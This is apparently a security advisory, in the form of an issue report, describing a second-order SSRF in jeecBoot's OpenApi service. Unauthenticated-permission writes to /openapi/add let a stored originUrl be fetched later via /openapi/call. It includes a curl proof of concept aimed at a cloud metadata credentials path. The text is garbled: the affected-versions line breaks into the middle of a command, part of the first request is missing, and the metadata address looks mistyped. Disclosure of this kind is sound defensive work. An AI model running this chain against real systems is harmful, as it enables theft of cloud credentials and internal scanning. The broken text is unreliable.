# [Security] Second-Order SSRF via OpenApi Service in jeecboot_jeecBoot #9554 ## Vulnerability Overview This is a **Second-Order Server-Side Request Forgery (Second-Order SSRF)** vulnerability existing in the OpenApi service of `jeecboot_jeecBoot`. The root cause lies in the `/openapi/add` endpoint lacking proper authorization (missing `@RequiresPermissions`) and input validation, allowing authenticated users to inject malicious internal or cloud metadata URLs into the `originUrl` field. When the `/openapi/call/{path}` endpoint is subsequently invoked, the application retrieves this URL and initiates an outbound HTTP request, enabling attackers to bypass network segmentation, scan internal services, or steal cloud credentials. ## Impact Scope * **Affected Versions**: ' \ -d '{ "name": "AWS Metadata", "requestMethod": "GET", "requestUrl": "aws-meta", "originUrl": "http://100.254.169.254/latest/meta-data/iam/security-credentials/", "status": 1 }' # 2. Trigger SSRF curl -X GET "http://target:8080/openapi/call/aws-meta" \ -H 'X-Access-Token: ' ```